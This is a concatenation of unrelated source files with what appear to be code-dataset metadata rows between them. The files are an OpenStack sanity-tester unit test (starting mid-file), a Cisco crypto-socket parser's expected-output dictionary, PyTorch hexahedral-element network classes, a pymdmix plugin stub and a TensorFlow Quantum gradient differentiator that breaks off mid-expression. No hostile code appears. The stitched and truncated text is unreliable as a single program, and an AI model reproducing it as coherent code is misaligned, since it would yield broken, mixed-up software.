conf.keystone.endpoint_type = 'publicURL'
conf.action = AttrDict(**kwargs)
def setup_tester(self):
self.in_queue = Queue.Queue()
self.out_queue = Queue.Queue()
self.insanity = mock.Mock()
tester = cli.Tester(in_queue=self.in_queue,
out_queue=self.out_queue,
insanity=self.insanity)
self.assertEqual(self.insanity.mock_calls, [mock.call.get_state()])
self.insanity.reset_mock()
self.assertTrue(self.in_queue.empty())
self.assertTrue(self.out_queue.empty())
return tester
def assertAllProcessed(self):
self.assertTrue(self.in_queue.empty())
self.assertTrue(self.out_queue.empty())
@mock.patch('sanity.runner.Runner')
@mock.patch('sanity.cli.CONF', new_callable=AttrDict)
def test_finished_processing(self, cli_conf, mock_runner):
self.setup_conf(cli_conf,
no_delete_failed=False, no_delete=False, test=[])
tester = self.setup_tester()
tester.finish()
tester()
@mock.patch('sanity.runner.Runner')
@mock.patch('sanity.cli.CONF', new_callable=AttrDict)
def test_processing_a_host(self, cli_conf, mock_runner):
self.setup_conf(cli_conf,
no_delete_failed=False, no_delete=False, test=[])
tester = self.setup_tester()
server = mock.Mock()
self.in_queue.put(server)
tester.finish()
tester()
server = self.out_queue.get_nowait()
self.assertAllProcessed()
self.assertEqual(mock_runner().method_calls,
[mock.call.run_server(self.insanity, server),
mock.call.cleanup()])
self.assertEqual(server.mock_calls,
[mock.call.delete()])
self.assertEqual(self.insanity.mock_calls,
[mock.call.wait_for_servers([server])])
@mock.patch('sanity.runner.Runner')
@mock.patch('sanity.cli.CONF', new_callable=AttrDict)
def test_processing_an_unbootable_server(self, cli_conf, mock_runner):
self.setup_conf(cli_conf,
no_delete_failed=False, no_delete=False, test=[])
tester = self.setup_tester()
server = scenarios.UnbootableServer()
self.in_queue.put(server)
tester.finish()
tester()
server = self.out_queue.get_nowait()
self.assertAllProcessed()
self.assertEqual(mock_runner().method_calls,
[mock.call.run_server(self.insanity, server),
mock.call.cleanup()])
self.assertEqual(self.insanity.mock_calls, [])
@mock.patch('sanity.runner.Runner')
@mock.patch('sanity.cli.CONF', new_callable=AttrDict)
def test_tester_stopped_server_delete_negative(self, cli_conf,
mock_runner):
self.setup_conf(cli_conf,
no_delete_failed=False, no_delete=False, test=[])
tester = self.setup_tester()
server = mock.Mock()
server.delete.side_effect = Exception('error deleting')
self.in_queue.put(server)
tester.finish()
tester.stop()
tester()
self.assertAllProcessed()
server.delete.assert_called_once_with()
self.assertEqual(mock_runner().method_calls,
[mock.call.cleanup()])
self.assertEqual(self.insanity.mock_calls, [])
@mock.patch('sanity.runner.Runner')
@mock.patch('sanity.cli.CONF', new_callable=AttrDict)
def test_tester_stopped_server_delete(self, cli_conf, mock_runner):
self.setup_conf(cli_conf,
no_delete_failed=False, no_delete=False, test=[])
tester = self.setup_tester()
server = mock.Mock()
self.in_queue.put(server)
tester.finish()
tester.stop()
tester()
self.assertAllProcessed()
server.delete.assert_called_once_with()
self.assertEqual(mock_runner().method_calls,
[mock.call.cleanup()])
self.assertEqual(self.insanity.mock_calls, [])
@mock.patch('sanity.runner.Runner')
@mock.patch('sanity.cli.CONF', new_callable=AttrDict)
@mock.patch.object(cli.Tester, 'test_server')
def test_server_test_exception(self, test_server, cli_conf, mock_runner):
self.setup_conf(cli_conf,
no_delete_failed=False, no_delete=False, test=[])
test_server.side_effect = Exception("Failed")
tester = self.setup_tester()
server = mock.Mock()
self.in_queue.put(server)
tester.finish()
tester()
test_server.assert_called_once_with(server)
server = self.out_queue.get_nowait()
self.assertAllProcessed()
self.assertEqual(mock_runner().method_calls,
[mock.call.cleanup()])
self.assertEqual(self.insanity.mock_calls, [])
@mock.patch('sanity.runner.Runner')
@mock.patch('sanity.cli.CONF', new_callable=AttrDict)
@mock.patch.object(cli.Tester, 'delete_server')
def test_delete_server_exception(self, delete_server, cli_conf,
mock_runner):
self.setup_conf(cli_conf,
no_delete_failed=False, no_delete=False, test=[])
delete_server.side_effect = Exception("Failed")
tester = self.setup_tester()
server = mock.Mock()
self.in_queue.put(server)
tester.finish()
tester()
delete_server.assert_called_once_with(server)
server = self.out_queue.get_nowait()
self.assertAllProcessed()
self.assertEqual(mock_runner().method_calls,
[mock.call.run_server(self.insanity, server),
mock.call.cleanup()])
self.assertEqual(self.insanity.mock_calls,
[mock.call.wait_for_servers([server])])
class UnitTestTesterThread(TestCase):
def setup_conf(self, conf):
conf.keystone = AttrDict()
conf.keystone.auth_url = 'mock://localhost'
conf.keystone.tenant_name = 'mock_tenant'
conf.keystone.username = 'mock_username'
conf.keystone.password = 'secret'
conf.keystone.endpoint_type = 'publicURL'
@mock.patch('sanity.runner.Runner')
@mock.patch('sanity.cli.CONF', new_callable=AttrDict)
def test_initialize(self, cli_conf, mock_runner):
in_queue = Queue.Queue()
out_queue = Queue.Queue()
insanity = mock.Mock()
self.setup_conf(cli_conf)
conf = AttrDict(no_delete_failed=False, no_delete=False, test=[])
cli_conf.action = conf
tester = cli.Tester(in_queue=in_queue,
out_queue=out_queue,
insanity=insanity)
mock_runner().setUpFixtures.return_value = None
tester.initialize()
self.assertEqual(tester.compromised, False)
mock_runner().setUpFixtures.return_value = mock.sentinel
tester.initialize()
self.assertEqual(tester.compromised, True)
class TestFixturerThread(TestCase):
def setup_conf(self, conf, **kwargs):
conf.keystone = AttrDict()
conf.keystone.auth_url = 'mock://localhost'
conf.keystone.tenant_name = 'mock_tenant'
conf.keystone.username = 'mock_username'
conf.keystone.password = 'secret'
conf.keystone.endpoint_type = 'publicURL'
conf.action = AttrDict(**kwargs)
def setup_tester(self):
self.in_queue = Queue.Queue()
self.out_queue = Queue.Queue()
self.insanity = mock.Mock()
tester = cli.Fixturer(in_queue=self.in_queue,
out_queue=self.out_queue,
insanity=self.insanity)
self.assertEqual(self.insanity.mock_calls, [])
self.insanity.reset_mock()
self.assertTrue(self.in_queue.empty())
self.assertTrue(self.out_queue.empty())
return tester
def assertAllProcessed(self):
self.assertTrue(self.in_queue.empty())
self.assertTrue(self.out_queue.empty())
@mock.patch('sanity.cli.CONF', new_callable=AttrDict)
def test_finished_processing(self, cli_conf):
self.setup_conf(cli_conf, no_delete_failed=False, with_fixture=[])
tester = self.setup_tester()
tester.finish()
tester()
@mock.patch('sanity.cli.CONF', new_callable=AttrDict)
def test_processing_a_host(self, cli_conf):
self.setup_conf(cli_conf, no_delete_failed=False, with_fixture=[])
tester = self.setup_tester()
server = mock.Mock()
self.in_queue.put(server)
tester.finish()
tester()
server = self.out_queue.get_nowait()
self.assertAllProcessed()
self.assertEqual(server.mock_calls, [])
self.assertEqual(self.insanity.mock_calls,
[mock.call.wait_for_servers([server]),
mock.call.state.nova.servers.get(server)])
@mock.patch('sanity.cli.CONF', new_callable=AttrDict)
def test_initialize(self, cli_conf):
self.setup_conf(cli_conf, no_delete_failed=False, with_fixture=[])
tester = self.setup_tester()
tester.initialize()
self.assertEqual(tester.compromised, False)
| 39.808989
| 78
| 0.628563
| 1,222
| 10,629
| 5.251228
| 0.135025
| 0.037089
| 0.044413
| 0.030856
| 0.824996
| 0.800686
| 0.788842
| 0.773259
| 0.766402
| 0.766402
| 0
| 0.001648
| 0.258068
| 10,629
| 266
| 79
| 39.958647
| 0.812072
| 0.05946
| 0
| 0.768889
| 0
| 0
| 0.054103
| 0
| 0
| 0
| 0
| 0
| 0.182222
| 1
| 0.084444
| false
| 0.013333
| 0.022222
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc8a5b4a81faa5faf0d899b2e8aad1414da5cf06
| 3,434
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowCryptoSockets/cli/equal/golden_1_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowCryptoSockets/cli/equal/golden_1_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowCryptoSockets/cli/equal/golden_1_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
expected_output = {
'socket_connections': {
'total_socket_connections': 4,
'sockets_in_listen_state': ['Tunnel1-head-0', 'Tunnel2-head-0', 'Tunnel3-head-0', 'Tunnel20-head-0'],
'Tu1': {
'peers': {
'remote_ip': '10.0.0.2',
'local_ip': '85.45.1.1'
},
'local_ident': {
'protocol': 47,
'mask': '255.255.255.255',
'port': 0,
'address': '85.45.1.1'
},
'remote_ident': {
'protocol': 47,
'mask': '255.255.255.255',
'port': 0,
'address': '10.0.0.2'
},
'socket_state': 'Open',
'ipsec_profile': 'star',
'client_state': 'Active',
'client_name': 'TUNNEL SEC'
},
'Tu2': {
'peers': {
'remote_ip': '10.0.0.2',
'local_ip': '85.45.2.1'
},
'local_ident': {
'protocol': 47,
'mask': '255.255.255.255',
'port': 0,
'address': '85.45.2.1'
},
'remote_ident': {
'protocol': 47,
'mask': '255.255.255.255',
'port': 0,
'address': '10.0.0.2'
},
'socket_state': 'Open',
'ipsec_profile': 'star',
'client_state': 'Active',
'client_name': 'TUNNEL SEC'
},
'Tu3': {
'peers': {
'remote_ip': '10.0.0.2',
'local_ip': '85.45.3.1'
},
'local_ident': {
'protocol': 47,
'mask': '255.255.255.255',
'port': 0,
'address': '85.45.3.1'
},
'remote_ident': {
'protocol': 47,
'mask': '255.255.255.255',
'port': 0,
'address': '10.0.0.2'
},
'socket_state': 'Open',
'ipsec_profile': 'star',
'client_state': 'Active',
'client_name': 'TUNNEL SEC',
'true_ident': ['0.0.0.0/0.0.0.0/0/0 -> 0.0.0.0/0.0.0.0/0/0', '::/0/0/0 -> ::/0/0/0']
},
'Tu20': {
'peers': {
'remote_ip': '22.1.1.1',
'local_ip': '21.1.1.1'
},
'local_ident': {
'protocol': 0,
'mask': '0.0.0.0',
'port': 0,
'address': '0.0.0.0'
},
'remote_ident': {
'protocol': 0,
'mask': '0.0.0.0',
'port': 0,
'address': '0.0.0.0'
},
'socket_state': 'Open',
'ipsec_profile': 'IPSEC_PROFILE',
'client_state': 'Active',
'client_name': 'TUNNEL SEC',
'true_ident': ['172.18.1.0/255.255.255.0/0/0 -> 10.4.0.0/255.255.255.0/0/0',
'172.17.1.0/255.255.255.0/0/0 -> 10.4.0.0/255.255.255.0/0/0',
'172.17.1.0/255.255.255.0/0/0 -> 10.1.0.0/255.255.255.0/0/0',
'172.16.1.0/255.255.255.0/0/0 -> 10.1.0.0/255.255.255.0/0/0',
'6664:3038:6162:6364::/64/0/0 -> 6664:3038:6665:6564::/64/0/0']
}
}
}
| 34.34
| 110
| 0.354106
| 385
| 3,434
| 3.049351
| 0.155844
| 0.110733
| 0.102215
| 0.091993
| 0.800681
| 0.770869
| 0.770869
| 0.770869
| 0.770869
| 0.722317
| 0
| 0.219904
| 0.455737
| 3,434
| 100
| 111
| 34.34
| 0.40824
| 0
| 0
| 0.59
| 0
| 0.06
| 0.409316
| 0.092868
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fca468b4cb8ee4246cb643257452fa3d4a56b71c
| 3,936
|
py
|
Python
|
machine_learning_module/hex_nn_models.py
|
msc-acse/acse-9-independent-research-project-lunayeliu
|
8643db1b21d6c2e7e6f1370a9b12a65ec67cce61
|
[
"MIT"
] | null | null | null |
machine_learning_module/hex_nn_models.py
|
msc-acse/acse-9-independent-research-project-lunayeliu
|
8643db1b21d6c2e7e6f1370a9b12a65ec67cce61
|
[
"MIT"
] | null | null | null |
machine_learning_module/hex_nn_models.py
|
msc-acse/acse-9-independent-research-project-lunayeliu
|
8643db1b21d6c2e7e6f1370a9b12a65ec67cce61
|
[
"MIT"
] | 1
|
2019-08-30T14:17:43.000Z
|
2019-08-30T14:17:43.000Z
|
from collections import OrderedDict
import torch.nn as nn
# 2 Layers model
class DLCM_hex_8_2(nn.Module):
"""
Network for hex 8 elements
Input - 8x3
2 layers
Output - 20
"""
def __init__(self):
super(DLCM_hex_8_2, self).__init__()
self.fc = nn.Sequential(OrderedDict([
('f1', nn.Linear(8*3, 50)),
('relu1', nn.ReLU()),
('f2', nn.Linear(50, 20)),
]))
def forward(self, input):
output = self.fc(input)
return output
# 3 Layers model
class DLCM_hex_8_3(nn.Module):
"""
Network for hex 8 elements
Input - 8x3
3 layers
Output - 20
"""
def __init__(self):
super(DLCM_hex_8_3, self).__init__()
self.fc = nn.Sequential(OrderedDict([
('f1', nn.Linear(8*3, 50)),
('relu1', nn.ReLU()),
('f2', nn.Linear(50, 50)),
('relu2', nn.ReLU()),
('f3', nn.Linear(50, 20)),
]))
def forward(self, input):
output = self.fc(input)
return output
class DLCM_hex_8_4(nn.Module):
"""
Network for hex 8 elements
Input - 8x3
4 layers
Output - 20
"""
def __init__(self):
super(DLCM_hex_8_4, self).__init__()
self.fc = nn.Sequential(OrderedDict([
('f1', nn.Linear(8*3, 50)),
('relu1', nn.ReLU()),
('f2', nn.Linear(50, 50)),
('relu2', nn.ReLU()),
('f3', nn.Linear(50, 40)),
('relu3', nn.ReLU()),
('f4', nn.Linear(40, 20)),
]))
def forward(self, input):
output = self.fc(input)
return output
#5 layers model
class DLCM_hex_8_5(nn.Module):
"""
Network for hex 8 elements
Input - 8x3
5 layers
Output - 20
"""
def __init__(self):
super(DLCM_hex_8_5, self).__init__()
self.fc = nn.Sequential(OrderedDict([
('f1', nn.Linear(8*3, 50)),
('relu1', nn.ReLU()),
('f2', nn.Linear(50, 50)),
('relu2', nn.ReLU()),
('f3', nn.Linear(50, 40)),
('relu3', nn.ReLU()),
('f4', nn.Linear(40, 30)),
('relu4', nn.ReLU()),
('f5', nn.Linear(30, 20))
]))
def forward(self, input):
output = self.fc(input)
return output
#6 layers model
class DLCM_hex_8_6(nn.Module):
"""
Network for hex 8 elements
Input - 8x3
6 layers
Output - 20
"""
def __init__(self):
super(DLCM_hex_8_6, self).__init__()
self.fc = nn.Sequential(OrderedDict([
('f1', nn.Linear(8*3, 50)),
('relu1', nn.ReLU()),
('f2', nn.Linear(50, 50)),
('relu2', nn.ReLU()),
('f3', nn.Linear(50, 40)),
('relu3', nn.ReLU()),
('f4', nn.Linear(40, 30)),
('relu4', nn.ReLU()),
('f5', nn.Linear(30, 25)),
('relu5', nn.ReLU()),
('f6', nn.Linear(25, 20)),
]))
def forward(self, input):
output = self.fc(input)
return output
#7 layers model
class DLCM_hex_8_7(nn.Module):
"""
Network for hex 8 elements
Input - 8x3
7 layers
Output - 20
"""
def __init__(self):
super(DLCM_hex_8_7, self).__init__()
self.fc = nn.Sequential(OrderedDict([
('f1', nn.Linear(8*3, 50)),
('relu1', nn.ReLU()),
('f2', nn.Linear(50, 50)),
('relu2', nn.ReLU()),
('f3', nn.Linear(50, 45)),
('relu3', nn.ReLU()),
('f4', nn.Linear(45, 40)),
('relu4', nn.ReLU()),
('f5', nn.Linear(40, 35)),
('relu5', nn.ReLU()),
('f6', nn.Linear(35, 30)),
('relu6', nn.ReLU()),
('f6', nn.Linear(35, 20)),
]))
def forward(self, input):
output = self.fc(input)
return output
| 24.6
| 45
| 0.473577
| 486
| 3,936
| 3.662551
| 0.113169
| 0.121348
| 0.053933
| 0.04382
| 0.940449
| 0.940449
| 0.814607
| 0.814607
| 0.814607
| 0.686517
| 0
| 0.086261
| 0.349085
| 3,936
| 159
| 46
| 24.754717
| 0.608509
| 0.109756
| 0
| 0.734694
| 0
| 0
| 0.047648
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.122449
| false
| 0
| 0.020408
| 0
| 0.265306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d8305f878d204ca983dec4d2f37793319e90b8f
| 85
|
py
|
Python
|
pymdmix_run/__init__.py
|
mdmix4/pymdmix-run
|
2c3fdeca39f02429ab0040491e2ad016de210795
|
[
"MIT"
] | null | null | null |
pymdmix_run/__init__.py
|
mdmix4/pymdmix-run
|
2c3fdeca39f02429ab0040491e2ad016de210795
|
[
"MIT"
] | null | null | null |
pymdmix_run/__init__.py
|
mdmix4/pymdmix-run
|
2c3fdeca39f02429ab0040491e2ad016de210795
|
[
"MIT"
] | null | null | null |
from pymdmix_run.run import RunPlugin
def get_plugin_class():
return RunPlugin
| 14.166667
| 37
| 0.788235
| 12
| 85
| 5.333333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164706
| 85
| 5
| 38
| 17
| 0.901408
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
f8e4366a7751b37008f9d0e7145ae40afc5eec6d
| 23,685
|
py
|
Python
|
tensorflow_quantum/python/differentiators/linear_combination.py
|
PyJedi/quantum
|
3f4a3c320e048b8a8faf3a10339975d2d5366fb6
|
[
"Apache-2.0"
] | 1
|
2020-03-10T04:12:46.000Z
|
2020-03-10T04:12:46.000Z
|
tensorflow_quantum/python/differentiators/linear_combination.py
|
PyJedi/quantum
|
3f4a3c320e048b8a8faf3a10339975d2d5366fb6
|
[
"Apache-2.0"
] | 2
|
2021-08-25T16:13:38.000Z
|
2022-02-10T02:36:50.000Z
|
tensorflow_quantum/python/differentiators/linear_combination.py
|
PyJedi/quantum
|
3f4a3c320e048b8a8faf3a10339975d2d5366fb6
|
[
"Apache-2.0"
] | 1
|
2020-03-12T07:19:12.000Z
|
2020-03-12T07:19:12.000Z
|
# Copyright 2020 The TensorFlow Quantum Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Compute gradients by combining function values linearly."""
import numbers
import numpy as np
import tensorflow as tf
from tensorflow_quantum.python.differentiators import differentiator
class LinearCombination(differentiator.Differentiator):
"""Differentiate a circuit with respect to its inputs by
linearly combining values obtained by evaluating the op using parameter
values perturbed about their forward-pass values.
>>> my_op = tfq.get_expectation_op()
>>> weights = [5, 6, 7]
>>> perturbations = [0, 0.5, 0.25]
>>> linear_differentiator = tfq.differentiators.LinearCombination(
... weights, perturbations
... )
>>> # Get an expectation op, with this differentiator attached.
>>> op = linear_differentiator.generate_differentiable_op(
... analytic_op=my_op
... )
>>> qubit = cirq.GridQubit(0, 0)
>>> circuit = tfq.convert_to_tensor([
... cirq.Circuit(cirq.X(qubit) ** sympy.Symbol('alpha'))
... ])
>>> psums = tfq.convert_to_tensor([[cirq.Z(qubit)]])
>>> symbol_values_array = np.array([[0.123]], dtype=np.float32)
>>> # Calculate tfq gradient.
>>> symbol_values_tensor = tf.convert_to_tensor(symbol_values_array)
>>> with tf.GradientTape() as g:
... g.watch(symbol_values_tensor)
... expectations = op(circuit, ['alpha'], symbol_values_tensor, psums
... )
>>> # Gradient would be: 5 * f(x+0) + 6 * f(x+0.5) + 7 * f(x+0.25)
>>> grads = g.gradient(expectations, symbol_values_tensor)
>>> # Note: this gradient visn't correct in value, but showcases
>>> # the principle of how gradients can be defined in a very flexible
>>> # fashion.
>>> grads
tf.Tensor([[5.089467]], shape=(1, 1), dtype=float32)
"""
def __init__(self, weights, perturbations):
"""Instantiate this differentiator.
Create a LinearComobinationDifferentiator. Pass in weights and
perturbations as described below.
Args:
weights: Python `list` of real numbers representing linear
combination coeffecients for each perturbed function
evaluation.
perturbations: Python `list` of real numbers representing
perturbation values.
"""
if not isinstance(weights, (np.ndarray, list, tuple)):
raise TypeError("weights must be a numpy array, list or tuple."
"Got {}".format(type(weights)))
if not all([isinstance(weight, numbers.Real) for weight in weights]):
raise TypeError("Each weight in weights must be a real number.")
if not isinstance(perturbations, (np.ndarray, list, tuple)):
raise TypeError("perturbations must be a numpy array,"
" list or tuple. Got {}".format(type(weights)))
if not all([
isinstance(perturbation, numbers.Real)
for perturbation in perturbations
]):
raise TypeError("Each perturbation in perturbations must be a"
" real number.")
if not len(weights) == len(perturbations):
raise ValueError("weights and perturbations must have the same "
"length.")
if not len(list(set(perturbations))) == len(perturbations):
raise ValueError("All values in perturbations must be unique.")
self.weights = tf.constant(weights)
self.n_perturbations = tf.constant(len(perturbations))
self.perturbations = tf.constant(perturbations)
@tf.function
def differentiate_analytic(self, programs, symbol_names, symbol_values,
pauli_sums, forward_pass_vals, grad):
# these get used a lot
n_symbols = tf.gather(tf.shape(symbol_names), 0)
n_programs = tf.gather(tf.shape(programs), 0)
n_ops = tf.gather(tf.shape(pauli_sums), 1)
# STEP 1: Generate required inputs for executor
# in this case I can do this with existing tensorflow ops if i'm clever
# don't do any computation for a perturbation of zero, just use
# forward pass values
mask = tf.not_equal(self.perturbations,
tf.zeros_like(self.perturbations))
non_zero_perturbations = tf.boolean_mask(self.perturbations, mask)
non_zero_weights = tf.boolean_mask(self.weights, mask)
n_non_zero_perturbations = tf.gather(tf.shape(non_zero_perturbations),
0)
# tile up symbols to [n_non_zero_perturbations, n_programs, n_symbols]
perturbation_tiled_symbols = tf.tile(
tf.expand_dims(symbol_values, 0),
tf.stack([n_non_zero_perturbations, 1, 1]))
def create_3d_perturbation(i, perturbation_values):
"""Generate a tensor the same shape as perturbation_tiled_symbols
containing the perturbations specified by perturbation_values."""
ones = tf.cast(
tf.concat([
tf.zeros(tf.stack([n_non_zero_perturbations, n_programs, i
])),
tf.ones(tf.stack([n_non_zero_perturbations, n_programs, 1
])),
tf.zeros(
tf.stack([
n_non_zero_perturbations, n_programs,
tf.subtract(n_symbols, tf.add(i, 1))
]))
],
axis=2), perturbation_values.dtype)
return tf.einsum('kij,k->kij', ones, perturbation_values)
def generate_perturbation(i):
"""Perturb each value in the ith column of
perturbation_tiled_symbols.
"""
return tf.add(
perturbation_tiled_symbols,
tf.cast(create_3d_perturbation(i, non_zero_perturbations),
perturbation_tiled_symbols.dtype))
# create a 4d tensor with the following dimensions:
# [n_symbols, n_perturbations, n_programs, n_symbols]
# the zeroth dimension represents the fact that we have to apply
# a perturbation in the direction of every parameter individually.
# the first dimension represents the number of perturbations that we
# have to apply, and the inner 2 dimensions represent the standard
# input format to the expectation ops
all_perturbations = tf.map_fn(generate_perturbation,
tf.range(n_symbols),
dtype=tf.float32)
# reshape everything to fit into expectation op correctly
total_programs = tf.multiply(
tf.multiply(n_programs, n_non_zero_perturbations), n_symbols)
# tile up and then reshape to order programs correctly
flat_programs = tf.reshape(
tf.tile(
tf.expand_dims(programs, 0),
tf.stack([tf.multiply(n_symbols, n_non_zero_perturbations),
1])), [total_programs])
flat_perturbations = tf.reshape(all_perturbations, [
tf.multiply(tf.multiply(n_symbols, n_non_zero_perturbations),
n_programs), n_symbols
])
# tile up and then reshape to order ops correctly
flat_ops = tf.reshape(
tf.tile(
tf.expand_dims(pauli_sums, 0),
tf.stack(
[tf.multiply(n_symbols, n_non_zero_perturbations), 1, 1])),
[total_programs, n_ops])
# STEP 2: calculate the required expectation values
expectations = self.expectation_op(flat_programs, symbol_names,
flat_perturbations, flat_ops)
# STEP 3: generate gradients according to the results
# we know the rows are grouped according to which parameter
# was perturbed, so reshape to reflect that
grouped_expectations = tf.reshape(
expectations,
[n_symbols,
tf.multiply(n_non_zero_perturbations, n_programs), -1])
# now we can calculate the partial of the circuit output with
# respect to each perturbed parameter
def rearrange_expectations(grouped):
def split_vertically(i):
return tf.slice(grouped, [tf.multiply(i, n_programs), 0],
[n_programs, n_ops])
return tf.map_fn(split_vertically,
tf.range(n_non_zero_perturbations),
dtype=tf.float32)
# reshape so that expectations calculated on different programs are
# separated by a dimension
rearranged_expectations = tf.map_fn(rearrange_expectations,
grouped_expectations)
# now we will calculate all of the partial derivatives
nonzero_partials = tf.einsum(
'spco,p->sco', rearranged_expectations,
tf.cast(non_zero_weights, rearranged_expectations.dtype))
# now add the contribution of a zero term if required
# find any zero terms
mask = tf.equal(self.perturbations, tf.zeros_like(self.perturbations))
zero_weight = tf.boolean_mask(self.weights, mask)
n_zero_perturbations = tf.gather(tf.shape(zero_weight), 0)
# this will have shape [n_symbols, n_programs, n_ops]
partials = tf.cond(
tf.equal(n_zero_perturbations, 0), lambda: nonzero_partials,
lambda: nonzero_partials + tf.multiply(
tf.tile(tf.expand_dims(forward_pass_vals, axis=0),
tf.stack([n_symbols, 1, 1])),
tf.cast(tf.gather(zero_weight, 0), forward_pass_vals.dtype)))
# now apply the chain rule
return tf.einsum('sco,co -> cs', partials, grad)
@tf.function
def differentiate_sampled(self, programs, symbol_names, symbol_values,
pauli_sums, num_samples, forward_pass_vals, grad):
# these get used a lot
n_symbols = tf.gather(tf.shape(symbol_names), 0)
n_programs = tf.gather(tf.shape(programs), 0)
n_ops = tf.gather(tf.shape(pauli_sums), 1)
# STEP 1: Generate required inputs for executor
# in this case I can do this with existing tensorflow ops if i'm clever
# don't do any computation for a perturbation of zero, just use
# forward pass values
mask = tf.not_equal(self.perturbations,
tf.zeros_like(self.perturbations))
non_zero_perturbations = tf.boolean_mask(self.perturbations, mask)
non_zero_weights = tf.boolean_mask(self.weights, mask)
n_non_zero_perturbations = tf.gather(tf.shape(non_zero_perturbations),
0)
# tile up symbols to [n_non_zero_perturbations, n_programs, n_symbols]
perturbation_tiled_symbols = tf.tile(
tf.expand_dims(symbol_values, 0),
tf.stack([n_non_zero_perturbations, 1, 1]))
def create_3d_perturbation(i, perturbation_values):
"""Generate a tensor the same shape as perturbation_tiled_symbols
containing the perturbations specified by perturbation_values."""
ones = tf.cast(
tf.concat([
tf.zeros(tf.stack([n_non_zero_perturbations, n_programs, i
])),
tf.ones(tf.stack([n_non_zero_perturbations, n_programs, 1
])),
tf.zeros(
tf.stack([
n_non_zero_perturbations, n_programs,
tf.subtract(n_symbols, tf.add(i, 1))
]))
],
axis=2), perturbation_values.dtype)
return tf.einsum('kij,k->kij', ones, perturbation_values)
def generate_perturbation(i):
"""Perturb each value in the ith column of
perturbation_tiled_symbols.
"""
return tf.add(
perturbation_tiled_symbols,
tf.cast(create_3d_perturbation(i, non_zero_perturbations),
perturbation_tiled_symbols.dtype))
# create a 4d tensor with the following dimensions:
# [n_symbols, n_perturbations, n_programs, n_symbols]
# the zeroth dimension represents the fact that we have to apply
# a perturbation in the direction of every parameter individually.
# the first dimension represents the number of perturbations that we
# have to apply, and the inner 2 dimensions represent the standard
# input format to the expectation ops
all_perturbations = tf.map_fn(generate_perturbation,
tf.range(n_symbols),
dtype=tf.float32)
# reshape everything to fit into expectation op correctly
total_programs = tf.multiply(
tf.multiply(n_programs, n_non_zero_perturbations), n_symbols)
# tile up and then reshape to order programs correctly
flat_programs = tf.reshape(
tf.tile(
tf.expand_dims(programs, 0),
tf.stack([tf.multiply(n_symbols, n_non_zero_perturbations),
1])), [total_programs])
flat_perturbations = tf.reshape(all_perturbations, [
tf.multiply(tf.multiply(n_symbols, n_non_zero_perturbations),
n_programs), n_symbols
])
# tile up and then reshape to order ops correctly
flat_ops = tf.reshape(
tf.tile(
tf.expand_dims(pauli_sums, 0),
tf.stack(
[tf.multiply(n_symbols, n_non_zero_perturbations), 1, 1])),
[total_programs, n_ops])
flat_num_samples = tf.reshape(
tf.tile(
tf.expand_dims(num_samples, 0),
tf.stack(
[tf.multiply(n_symbols, n_non_zero_perturbations), 1, 1])),
[total_programs, n_ops])
# STEP 2: calculate the required expectation values
expectations = self.expectation_op(flat_programs, symbol_names,
flat_perturbations, flat_ops,
flat_num_samples)
# STEP 3: generate gradients according to the results
# we know the rows are grouped according to which parameter
# was perturbed, so reshape to reflect that
grouped_expectations = tf.reshape(
expectations,
[n_symbols,
tf.multiply(n_non_zero_perturbations, n_programs), -1])
# now we can calculate the partial of the circuit output with
# respect to each perturbed parameter
def rearrange_expectations(grouped):
def split_vertically(i):
return tf.slice(grouped, [tf.multiply(i, n_programs), 0],
[n_programs, n_ops])
return tf.map_fn(split_vertically,
tf.range(n_non_zero_perturbations),
dtype=tf.float32)
# reshape so that expectations calculated on different programs are
# separated by a dimension
rearranged_expectations = tf.map_fn(rearrange_expectations,
grouped_expectations)
# now we will calculate all of the partial derivatives
nonzero_partials = tf.einsum(
'spco,p->sco', rearranged_expectations,
